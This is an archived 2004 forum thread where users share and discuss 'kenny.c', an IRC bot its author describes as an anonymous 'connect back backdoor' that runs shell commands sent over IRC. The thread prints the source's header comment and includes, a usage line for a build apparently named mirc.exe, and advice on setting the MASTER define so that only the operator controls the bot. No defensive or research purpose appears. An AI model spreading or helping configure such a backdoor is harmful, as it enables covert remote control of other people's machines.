thnx to the author and the guy who posted this bot in exploit section
CODE
{+} usage: mirc.exe <server:port> <chan> [ch_key]
Compiled in cygwin without any errors...
enjoy guys
320X
Jun 6 2004, 07:45 AM
other more
midi69
Jun 6 2004, 10:17 AM
thx alot but how do i use it?
Qlimax
Jun 6 2004, 10:35 AM
which options that bot's got?
tnx!
The Storm
Jun 6 2004, 01:05 PM
you can execute commands per IRC.... but you must define your master
CODE
/* ** kenny.c by konewka <konewka@eviltime.com> ** ** Simple IRC bot, that can execute shell commands and print it out ** to you. With this bot you may execute shell commands with full anonymity, ** it's kind of connect back backdoor. ** ** It has been tested on IRCnet and EFnet IRC networks, and should ** compile without any problems on Linux and FreeBSD. ** ** If you want only one certain host to execute commands compile with ** -DMASTERONLY flag and change MASTER define. ** ** Fell free to add your functions, but keep my nickname in credits. */ #include <stdio.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <unistd.h> #include <sys/select.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <string.h> #include <stdarg.h>
you can execute commands per IRC.... but you must define your master
u can give me exemple?
subcorner
Jun 6 2004, 02:41 PM
Qlimax, u have to change te cross define #define MASTER "konewka@pr90.poznan.sdi.tpnet.pl" with ur vhost!!
thx 4 the code dude
Serhat
Jun 6 2004, 07:04 PM
tried to compile the SOURCE myself .. does it flawlessly.. BUT... when giving the command it just does nothing when it should connect (it asks for internet access and I let it go through) ... but it doesn't joins the channel...
Serhat
Qlimax
Jun 7 2004, 01:36 PM
QUOTE (subcorner @ Jun 6 2004, 02:41 PM)
Qlimax, u have to change te cross define #define MASTER "konewka@pr90.poznan.sdi.tpnet.pl" with ur vhost!!
thx 4 the code dude
i ask 4 the "execute commands per IRC"...
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.